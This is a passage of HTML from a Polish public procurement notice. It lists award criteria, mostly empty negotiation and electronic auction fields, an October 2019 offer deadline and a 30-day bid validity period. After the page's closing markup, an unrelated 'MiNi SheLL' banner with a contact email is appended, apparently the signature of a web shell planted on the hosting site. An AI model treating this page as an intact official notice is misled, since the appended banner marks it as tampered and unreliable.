<span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-10-04</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30 dni</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com